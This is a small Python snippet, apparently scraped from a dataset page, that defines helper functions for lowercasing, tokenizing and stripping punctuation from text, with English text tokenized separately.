def normalize_str(input_str, lang):
input_str_tokens = basic_tokenize(input_str.strip().lower(), lang)
input_str = ' '.join(input_str_tokens)
input_str = input_str.replace(' ', ' ')
return input_str
def remove_puncts(input_str):
return input_str.translate(str.maketrans('', '', string.punctuation))
def basic_tokenize(input_str, lang):
if lang == constants.ENGLISH:
return word_tokenize(input_str)
return input_str.strip().split(' ')
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.